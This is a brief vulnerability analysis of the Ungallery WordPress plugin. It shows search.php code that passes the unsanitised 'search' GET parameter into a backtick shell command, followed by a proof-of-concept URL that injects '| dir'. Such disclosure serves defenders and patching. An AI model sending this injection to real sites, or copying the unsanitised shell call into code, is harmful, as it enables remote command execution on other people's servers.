Analysis of vulnerability
The Ungallery for WordPress offers functionality for searching for pictures in a gallery, which is implemented through the plain filesystem in search.php.
|
18 19 20 21 22 23 24 25 26 27 28 29 30 |
$gallerylink = ($_GET['gallerylink']) ; $search = ($_GET['search']) ; $dir = $pic_root . $gallerylink; // Find galleries print "Searching in <i>$dir.</i> <br /> <br />"; print "These galleries matched <i>$search:</i><br />"; $galleries = `find $dir -iname \*$search\* -type d`; $galleries = explode("\n", $galleries); |
Note that theĀ backtick character in PHP has a special meaning, as opposed to the ” and ‘. When you wrap something in 2 backtick characters, it will act as if the contents between them is passed to shell_exec. Note however that the $search variable, which is extracted from the search GET variable, is never sanitized before passed into the exec on line 28. This means that we can pull off a remote command injection with a simple request like this:
|
1 |
http://192.168.80.130/wordpress/?x=x&search=x | dir |